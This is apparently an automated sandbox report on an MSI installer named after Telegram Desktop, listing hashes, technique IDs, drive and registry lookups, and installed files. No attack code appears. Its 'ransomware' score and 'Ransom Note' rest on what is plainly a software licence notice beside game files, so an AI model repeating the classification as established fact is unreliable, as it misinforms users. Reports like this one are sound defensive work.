251dba4d350685d32c16d0b555a1dc13d095d7a64399d01e9d9149f22a23dc1c

Analysis

max time kernel
272s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2022 05:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Telegram Desktop (19).msi
Size

188.9MB
MD5

0f4b7f6da9b1375839b3e96dd2ca8c3d
SHA1

d7c72fa3e4972152dda761682ab3e80b44842283
SHA256

251dba4d350685d32c16d0b555a1dc13d095d7a64399d01e9d9149f22a23dc1c
SHA512

928395df18eacf4b189e0d04fb9c4ed9df90c406717dfc8f1e98a7cb0ed64d97848a6c34522005a58d647d340f96c28f50ccb8526e80e7079a06dc7ce7f25c41
SSDEEP

3145728:t8eWmtYoa0bEut/C6LOJCIx7p0pQMyAC5kndaZcee3iaASySuiNfX1XlL:tlTtYBcEs3KCIx7qWMjTeEOSyJiv

Score

10^/10

ransomware

Malware Config

Extracted

Path

C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\ThirdPartyNotices.txt

Ransom Note

This production is brought to you, in part, by the following libraries. Most of the libraries listed below are parts of the Chromium web browser, embedded using CEF: https://www.chromium.org/Home https://bitbucket.org/chromiumembedded/cef The files that primarily contain code from Chromium are the zf_cef.dll/so (normally named libcef.dll/so) and "Chromium Embedded Framework" shared libraries. Note that some of the libraries listed below are only used as tools during building and development and are not included with this product. Check the Chromium source code for details. ----------------------------------------------------------------------- OpenVR C# Bindings 1.0.10 https://github.com/ValveSoftware/openvr/blob/master/headers/openvr_api.cs ----------------------------------------------------------------------- Copyright (c) 2015, Valve Corporation All rights reserved. --- See BSD License (A) at the end of this file --- ----------------------------------------------------------------------- ----------------------------------------------------------------------- SimpleJson.cs https://github.com/facebook-csharp-sdk/simple-json ----------------------------------------------------------------------- Copyright (c) 2011, The Outercurve Foundation, 2015 Zen Fulcrum LLC Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.opensource.org/licenses/mit-license.php Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Nathan Totten (ntotten.com), Jim Zimmerman (jimzimmerman.com), Prabir Shrestha (prabir.me), Jonathan Stephens ----------------------------------------------------------------------- ----------------------------------------------------------------------- C-Sharp-Promise https://github.com/Real-Serious-Games/C-Sharp-Promise ----------------------------------------------------------------------- The MIT License (MIT) Copyright (c) 2014 Real Serious Games --- See MIT License at the end of this file --- ----------------------------------------------------------------------- ----------------------------------------------------------------------- libX11 https://www.x.org/wiki/ ----------------------------------------------------------------------- Copyright © 1985, 1986, 1987, 1988, 1989, 1991, 1994, 1996, 2002 The Open Group Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE OPEN GROUP BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Except as contained in this notice, the name of The Open Group shall not be used in advertising or otherwise to promote the sale, use or other dealings in this Software without prior written authorization from The Open Group. Copyright © 1985, 1986, 1987, 1988, 1989, 1991 Digital Equipment Corporation Permission to use, copy, modify and distribute this documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appears in all copies and that both that copyright notice and this permission notice appear in supporting documentation, and that the names of Digital and Tetronix not be used in in advertising or publicity pertaining to distribution of the software without specific, written prior permission. Digital and Tetronix make no representations about the suitability of the software described herein for any purpose. It is provided “as is” without express or implied warranty. TekHVC is a trademark of Tektronix, Inc. ----------------------------------------------------------------------- ----------------------------------------------------------------------- Chromium Embedded Framework https://bitbucket.org/chromiumembedded/cef/ ----------------------------------------------------------------------- Copyright (c) 2008-2014 Marshall A. Greenblatt. Portions Copyright (c) 2006-2009 Google Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Google Inc. nor the name Chromium Embedded Framework nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ----------------------------------------------------------------------- ----------------------------------------------------------------------- (Components of) Bazel https://github.com/bazelbuild/bazel ----------------------------------------------------------------------- --- See Apache License (A) at the end of this file --- --- See Apache License Appendix (A) at the end of this file --- ----------------------------------------------------------------------- ----------------------------------------------------------------------- AXE-CORE Accessibility Audit https://github.com/dequelabs/axe-core/ ----------------------------------------------------------------------- --- See Mozilla Public License (A) at the end of this file --- ----------------------------------------------------------------------- ----------------------------------------------------------------------- Accessibility Audit library, from Accessibility Developer Tools https://raw.githubusercontent.com/GoogleChrome/accessibility-developer-tools/master/dist/js/axs_testing.js ----------------------------------------------------------------------- --- See Apache License (A) at the end of this file --- --- See Apache License Appendix (A) at the end of this file --- ----------------------------------------------------------------------- ----------------------------------------------------------------------- Alliance for Open Media Video Codec https://aomedia.googlesource.com/aom/ ----------------------------------------------------------------------- Copyright (c) 2016, Alliance for Open Media. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ----------------------------------------------------------------------- ----------------------------------------------------------------------- Almost Native Graphics Layer Engine http://code.google.com/p/angleproject/ ----------------------------------------------------------------------- // Copyright (C) 2002-2013 The ANGLE Project Authors. // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // // Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials provided // with the distribution. // // Neither the name of TransGaming Inc., Google Inc., 3DLabs Inc. // Ltd., nor the names of their contributors may be used to endorse // or promote products derived from this software without specific // prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, // INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, // BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; // LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT // LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN // ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE // POSSIBILITY OF SUCH DAMAGE. ----------------------------------------------------------------------- ----------------------------------------------------------------------- American Fuzzy Lop http://lcamtuf.coredump.cx/afl/ ----------------------------------------------------------------------- --- See Apache License (A) at the end of this file --- --- See Apache License Appendix (A) at the end of this file --- ----------------------------------------------------------------------- ----------------------------------------------------------------------- Android http://source.android.com/ ----------------------------------------------------------------------- --- See Apache License (A) at the end of this file --- --- See Apache License Appendix (A) at the end of this file --- ----------------------------------------------------------------------- ----------------------------------------------------------------------- Android Crazy Linker https://chromium.googlesource.com/chromium/src.git/+/master/third_party/android_crazy_linker/ ----------------------------------------------------------------------- // Copyright 2014 The Chromium Authors. All rights reserved. // // --- See BSD License (Google) at the end of this file --- Copyright (C) 2012 The Android Open Source Project * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ ----------------------------------------------------------------------- ----------------------------------------------------------------------- Android Explicit Synchronization http://source.android.com/ ----------------------------------------------------------------------- --- See Apache License (A) at the end of this file --- --- See Apache License Appendix (A) at the end of this file --- ----------------------------------------------------------------------- ----------------------------------------------------------------------- Android FloatProperty https://developer.android.com/reference/android/util/FloatProperty.html ----------------------------------------------------------------------- Copyright (c) 2005-2008, The Android Open Source Project Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --- See Apache License (A) at the end of this file --- APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright 2011 Google Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License

Emails

URLs

https://www.chromium.org/Home

https://bitbucket.org/chromiumembedded/cef

https://github.com/ValveSoftware/openvr/blob/master/headers/openvr_api.cs

https://github.com/facebook-csharp-sdk/simple-json

http://www.opensource.org/licenses/mit-license.php

https://github.com/Real-Serious-Games/C-Sharp-Promise

https://www.x.org/wiki/

https://bitbucket.org/chromiumembedded/cef/

https://github.com/bazelbuild/bazel

https://github.com/dequelabs/axe-core/

https://raw.githubusercontent.com/GoogleChrome/accessibility-developer-tools/master/dist/js/axs_testing.js

https://aomedia.googlesource.com/aom/

http://code.google.com/p/angleproject/

http://lcamtuf.coredump.cx/afl/

http://source.android.com/

https://chromium.googlesource.com/chromium/src.git/+/master/third_party/android_crazy_linker/

https://developer.android.com/reference/android/util/FloatProperty.html

http://www.apache.org/licenses/LICENSE-2.0

https://android.googlesource.com/platform/frameworks/support

https://android.googlesource.com/platform/packages/apps/Settings/

Signatures

Blocklisted process makes network request 6 IoCs

Processes:

msiexec.exemsiexec.exe

flow pid process

10 1388 msiexec.exe
12 1388 msiexec.exe
14 1388 msiexec.exe
28 1388 msiexec.exe
39 1388 msiexec.exe
61 3188 msiexec.exe
Executes dropped EXE 1 IoCs

Processes:

ChromeRecovery.exe

pid process

3820 ChromeRecovery.exe

flow	pid	process
10	1388	msiexec.exe
12	1388	msiexec.exe
14	1388	msiexec.exe
28	1388	msiexec.exe
39	1388	msiexec.exe
61	3188	msiexec.exe

pid	process
3820	ChromeRecovery.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 17 IoCs

Processes:

MsiExec.exeMsiExec.exe

pid	process
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
4328	MsiExec.exe
2640	MsiExec.exe
2640	MsiExec.exe
2640	MsiExec.exe
4328	MsiExec.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in System32 directory 12 IoCs

Processes:

MsiExec.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\symbols\tmp\ResourceCleaner.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\wntdll.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\dll\wntdll.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wntdll.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msi.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\DLL\wkernel32.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\tmp\ResourceCleaner.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\msi.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\dll\msi.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\wkernel32.pdb	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\ResourceCleaner.pdb	MsiExec.exe

Drops file in Program Files directory 64 IoCs

Processes:

msiexec.exeelevation_service.exe

description	ioc	process
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\level10	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Diagnostics.StackTrace.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.PhysicsModule.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Wizards.Mtga.Metadata.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\es.pak.info	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ko.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\lt.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.Purchasing.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.TilemapModule.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.TLSModule.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\et.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\fr.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ms.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\StreamingAssets\UnityServicesProjectConfiguration.json	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\level3	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\com.wizards.platform.sdk.unity.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Buffers.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Runtime.Serialization.Xml.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Unity.Services.Core.Scheduler.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\version	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\level2.resS	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Xml.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.Purchasing.SecurityStub.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.StreamingModule.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.UI.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA.exe	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\SQLitePCLRaw.batteries_v2.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.ClothModule.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.ProfilerModule.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\cs.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\pt-PT.pak.info	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\sharedassets5.assets.resS	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Runtime.Extensions.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Unity.MemoryProfiler.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Wizards.Mtga.Interfaces.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\fa.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ml.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\nl.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\nl.pak.info	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\StreamingAssets\Audio\GeneratedSoundBanks\Windows\STARTUP.bnk	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Globalization.Extensions.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.Purchasing.WinRTCore.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\libGLESv2.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\bg.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ta.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\th.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\boot.config	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.UnityConnectModule.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\pl.pak.info	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ru.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\tr.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\widevinecdmadapter.dll	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ca.pak.info	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\te.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Resources\browser_assets	msiexec.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir1048_807589028\manifest.json	elevation_service.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\etc\mono\2.0\Browsers\Compat.browser	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\id.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ml.pak.info	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\pt-PT.pak	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\v8_context_snapshot.bin	msiexec.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir1048_807589028\ChromeRecovery.exe	elevation_service.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\level1.resS	msiexec.exe
File created	C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Firebase.Analytics.dll	msiexec.exe

Drops file in Windows directory 27 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\e5885d5.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF89D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI64E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF84E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFF16.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFF84.tmp	msiexec.exe
File created	C:\Windows\Installer\e5885d5.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8AF5.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{FA8A9218-7326-4651-A12B-A1F9EE439F91}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E23.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE57E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{FA8A9218-7326-4651-A12B-A1F9EE439F91}\MTGALauncher.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI25FC.tmp	msiexec.exe
File created	C:\Windows\Installer\e5885d8.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI42DC.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8EE0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8F4F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI13C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEB6B.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E72.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI41.tmp	msiexec.exe
File created	C:\Windows\Installer\{FA8A9218-7326-4651-A12B-A1F9EE439F91}\MTGALauncher.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF1C5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6950.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
